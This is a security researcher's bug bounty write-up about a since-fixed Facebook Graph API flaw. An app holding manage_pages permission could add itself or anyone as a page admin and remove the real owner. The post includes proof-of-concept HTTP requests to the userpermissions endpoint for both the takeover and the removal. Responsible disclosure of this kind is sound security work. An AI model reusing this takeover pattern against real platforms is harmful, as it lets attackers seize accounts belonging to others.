Hacking Facebook Pages

A security vulnerability in Facebook business manager endpoint allows a third party application to hack Facebook account page with limited permissions and the victim will permanently lose admin access to the page.
By default, Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles like a manager, editor, analyst etc.). Third-party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as an admin to the page and remove the actual owner permanently.

On the other hand, there is an endpoint for business pages called userpermissions that allows one to add or remove business page admin roles who are already handling the Facebook business.

The following request would make target user as admin of the page.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>
 
Response:-
true

After a few minutes of testing, I got to know that removing the business parameter from the request didn’t throw any error and allow us to add anyone as new page admin and delete the actual page admin on the non-business page where the application has manage_pages permission.

That’s it! Whatever the application may be, if it is having the manage_pages permission of the admin then it could hack all of your Facebook account pages in a fraction of seconds.

Final Proof of Concept of Page Takeover:- 

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
true

 

Removing Victim:

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response:-
true
That’s all! Target page is hacked!
 

Reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as a part of their bug bounty program.Even though they placed a fix for this vulnerability, please be aware of the permissions you grant to any applications.

Permissions dialog box would look like this

Manage pages permission dialog box

If manage_pages is requested please note that this app would be able to manage your pages (post statuses, publish photos etc..).

People need not worry, we can still modify the permissions you have granted to other apps here.

Facebook reply after few emails

Acknowledgement of Fix

Laxman Muthiyah
Laxman Muthiyah
This is the place where I write about things that I have explored. I hope you enjoy your stay!

Related Stories

23 Comments

  1. The video could be more usefull if you slow down. And perhaps add some text about what you&#39re doing.

    Keep up the good work! Enjoy, the bounty 😉

  2. Could you help please my business page was hacked a month ago after 3 cases with Facebook certified lawyers letters they don’t seem to be bothered even no I have lost my livelihood and income

Leave A Reply

Please enter your comment!
Please enter your name here

Stay on top - Get the latest updates in your inbox